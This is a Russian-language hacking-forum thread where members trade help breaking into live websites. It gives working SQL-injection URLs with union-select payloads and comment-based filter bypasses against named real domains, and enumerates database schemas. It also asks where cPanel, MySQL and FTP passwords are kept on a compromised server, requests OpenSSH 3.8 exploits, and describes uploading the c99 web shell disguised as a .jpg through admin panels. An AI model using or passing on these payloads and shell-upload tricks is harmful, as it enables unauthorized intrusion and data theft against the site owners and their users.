Что можно сделать с такими правами?) случайно на одном забугорхостинге нашел - протыкал на своем шелле кнопочку вверх и попал в этот католог все файло и дампы просматривать можно
и какой ответ ты хочешь услышать? в чем именно твой вопрос конкретно? если сейчас обьяснять тебе что можно делать на серванте с такими правами..я боюсь что на статью потянет..и еще откликнутся еще много добрых молодцев страстно желающие тебе помочь и будут вставлять свои 5 копеек по поводу использования шелла с "такими правам"...
http://www.site.com/index.php?_a=viewCat&catId=145' сайт является уязвимым Я не могу подсчитать число столбцов уязвимых ошибке Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/site.com/httpdocs/includes/content/viewCat.inc.php on line 41 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''a' at line 1
все экстрасенсы на отдыхе сейчас, вернись через пару месяцев..а лучше никогда вот тебе ответ http://www.site.com/index.php?_a=viewCat&catId=145'+правильный синтаксис запроса SQL не знаю если поймешь так как ты не русско-язычный..а гугл не сможет перевести, но все твои вопросы попадают под категорию "Пойди туда ,не знаю куда, принеси то, не знаю что"
Хотелось бы узнать где обычно лежат пароли от Cpanel mysql фтп Хотя ,наверно,без знаний линух смысла нет мне туда суватся, пускай пока живет
Прочитал статейку про обход фильтрации, но ни один приведённый способ не помог.Не смог применить на практике, но часто встречаюсь. Поэтому материал не усвоил =) Хотелось бы на живом примере. Вот нашел сайт, вроде подходящий. http://aktualnews.com/sport/?id=764' select%20 или (+) c пробелом фильтруется (Forbidden), с /**/ запрос проходит. Версия 5.0.90-community http://aktualnews.com/sport/?id=-764/**/union/**/select/**/1,2,version(),4,5--+ Имена таблиц из information_schema.tables получить не могу, т.к. from фильтруется тоже. Вот как его обойти и хотелось бы увидеть на примере. возможно просто нет доступа к information_schema.tables, но я с таким ещё не встречался.Поэтому мне кажется дело в фильтрации,но я могу и ошибаться.
auth_root http://aktualnews.com/sport/?id=-764/**/union/**/select/**/1,2,column_name,4,5/**/FrOm/**/information_schema.columns--+ там фильтр на information_schema.tables
Konqi Спасибо... А ларчик просто открывался =) опять не повезло. Ладно, поищу что нибудь подходящее =)
Exploit for OpenSSH 3.8 Ребят, под эту версию есть какие нибудь эксплоиты? весь гугл перерыл - ничего дельного не нашел =(
_http://aktualnews.com/sport/?id=-764/**/union/**/select/**/1,2,3,4,5/**/FrOm/**/information_schema.`tables`--+
Как можно попасть в админку, если есть запрос при авторизации SELECT pass FROM user WHERE username = '[SQL]' Этиим запросом достается пароль и сверяется с тем паролем, что я ввел, поэтому "or 1=1--" и прочее не подходит.
http://www.arbeitsmarktportal.eu/stellengesuche-anzeigen.php?recordID=1816+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,unhex(hex(version()),38,39,40,41,42,43,44,45+LIMIT+1,1-- Database Version: 4.1.13
если не получается в одном скрипте реализовать sql, то ищи другие скрипты и пробуй реализовать там, как впринцепи и зделал Gorev
переименовал шелл c99.php на c99.php.jpg попробовал уже на 2х админках, не заливается выдает ошибку что не тот формат можт че не так или админ сильно умный
конечно же все зависит от скрипта через который происходит заливка, не все же скрипты проверяют расширение...у некоторых есть и другие способы защиты от заливки нежелательных файлов тыц мышкой
еще вопрос , залил все таки шелл c99.php.jpg , но страница не отображается пишет 403 http://www.site.org/docs/c99madshell.php.jpg